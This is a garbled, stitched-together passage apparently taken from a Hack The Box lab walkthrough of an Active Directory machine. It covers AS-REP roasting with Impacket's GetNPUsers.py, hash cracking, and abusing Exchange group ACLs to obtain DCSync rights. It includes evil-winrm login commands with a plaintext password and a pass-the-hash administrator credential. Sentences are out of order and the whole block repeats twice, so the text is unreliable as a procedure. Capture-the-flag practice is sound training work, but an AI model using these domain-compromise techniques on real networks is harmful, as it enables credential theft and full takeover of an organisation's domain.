: Abuse ACL permissions (specifically for the "Exchange Windows Permissions" or "Exchange Trusted Subsystem" groups) to grant yourself DCSync rights.
evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90f43dfa1e816ec0a1c8
The script queries the Domain Controller for each user. If pre-auth is disabled, it returns an encrypted blob (the AS-REP).
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
, with "Do not require Kerberos pre-authentication" enabled. Hack The Box Request Ticket Impacket's GetNPUsers.py to request an AS-REP for this user. Crack the Hash
: Abuse ACL permissions (specifically for the "Exchange Windows Permissions" or "Exchange Trusted Subsystem" groups) to grant yourself DCSync rights.
evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90f43dfa1e816ec0a1c8
The script queries the Domain Controller for each user. If pre-auth is disabled, it returns an encrypted blob (the AS-REP).
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
, with "Do not require Kerberos pre-authentication" enabled. Hack The Box Request Ticket Impacket's GetNPUsers.py to request an AS-REP for this user. Crack the Hash
